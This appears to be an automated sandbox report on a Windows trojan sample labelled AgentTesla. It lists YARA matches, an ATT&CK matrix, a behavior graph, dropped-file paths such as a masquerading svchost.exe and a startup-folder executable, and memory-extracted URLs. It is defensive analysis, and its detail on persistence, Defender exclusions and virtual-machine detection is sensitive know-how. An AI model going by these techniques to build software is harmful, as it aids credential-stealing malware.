                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38b97a0.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.38d97c0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3e41440.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.39197e0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.39197e0.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.434117466.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432432130.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374239562.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.374484408.0000000003919000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation331Startup Items1Startup Items1Disable or Modify Tools211OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1DLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery134Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Windows Service1Application Shimming1Timestomp1NTDSSecurity Software Discovery461Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronRegistry Run Keys / Startup Folder321Access Token Manipulation1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion261SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonWindows Service1Masquerading221Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsProcess Injection212Virtualization/Sandbox Evasion261DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder321Access Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 483863 Sample: VknMvPoCXZ Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 60 Multi AV Scanner detection for dropped file 2->60 62 Sigma detected: Powershell adding suspicious path to exclusion list 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 9 other signatures 2->66 7 VknMvPoCXZ.exe 9 11 2->7         started        11 svchost.exe 2->11         started        13 481F404B.exe 2->13         started        16 9 other processes 2->16 process3 dnsIp4 42 C:\Windows\Resources\Themes\...\svchost.exe, PE32 7->42 dropped 44 C:\Users\user\AppData\...\481F404B.exe, PE32 7->44 dropped 46 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 7->46 dropped 54 2 other files (1 malicious) 7->54 dropped 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->74 76 Creates autostart registry keys with suspicious names 7->76 78 Drops PE files to the startup folder 7->78 86 4 other signatures 7->86 18 aspnet_compiler.exe 7->18         started        21 481F404B.exe 7->21         started        24 WerFault.exe 7->24         started        28 9 other processes 7->28 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 11->48 dropped 80 Multi AV Scanner detection for dropped file 11->80 82 Adds a directory exclusion to Windows Defender 11->82 56 192.168.2.1 unknown unknown 13->56 50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 13->50 dropped 58 127.0.0.1 unknown unknown 16->58 52 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 16->52 dropped 84 Changes security center settings (notifications, updates, antivirus, firewall) 16->84 26 WerFault.exe 16->26         started        file5 signatures6 process7 file8 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->68 70 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->70 38 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 21->38 dropped 72 Adds a directory exclusion to Windows Defender 21->72 40 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 24->40 dropped 30 AdvancedRun.exe 28->30         started        32 conhost.exe 28->32         started        34 conhost.exe 28->34         started        36 6 other processes 28->36 signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      VknMvPoCXZ.exe48%VirustotalBrowse
                      VknMvPoCXZ.exe44%ReversingLabsWin32.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe44%ReversingLabsWin32.Trojan.AgentTesla
                      C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe44%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.jiyu-kobo.co.jp/curs0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/H.0%Avira URL Cloudsafe
                      http://www.sandoll.co.krlea0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.sandoll.co.kropyw2-0%Avira URL Cloudsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      https://mhconsultores.net.ve/0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.sandoll.co.krB20%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/c.0%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
                      http://www.microsoftc.0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://www.fontbureau.comicva0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/5.0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      http://www.tiro.comnm0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.founder.com.cn/cnf0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.fontbureau.comue0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://www.sajatypeworks.comnt0%Avira URL Cloudsafe
                      http://www.fontbureau.comm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/cursVknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                        		high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                          		high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpfalse
                            		high
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersVknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sajatypeworks.comVknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/H.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krleaVknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.urwpp.deDPleaseVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.zhongyicts.com.cnVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmpfalse
                                            		high
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipVknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sandoll.co.kropyw2-VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.fonts.comcVknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmpfalse
                                              		high
                                              https://mhconsultores.net.ve/svchost.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                		high
                                                http://crl.ver)svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://%s.xboxlive.comsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		low
                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://en.wVknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sandoll.co.krB2VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/c.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://dynamic.tsvchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/Y0/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.microsoftc.VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.fontbureau.com/designersGVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/?VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/bTheVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://ocsp.sectigo.com0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.comicvaVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers?VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.tiro.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.jiyu-kobo.co.jp/5.VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.goodfont.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.tiro.comnmVknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.typography.netDVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.galapagosdesign.com/staff/dennis.htmVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://fontfabrik.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://sectigo.com/CPS0CVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://sectigo.com/CPS0DVknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fonts.comVknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.sandoll.co.krVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.founder.com.cn/cnfVknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.sakkal.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.comVknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.comueVknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://sectigo.com/CPS0VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.fontbureau.com/designers19VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://activity.windows.comrsvchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.jiyu-kobo.co.jp/jp/VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
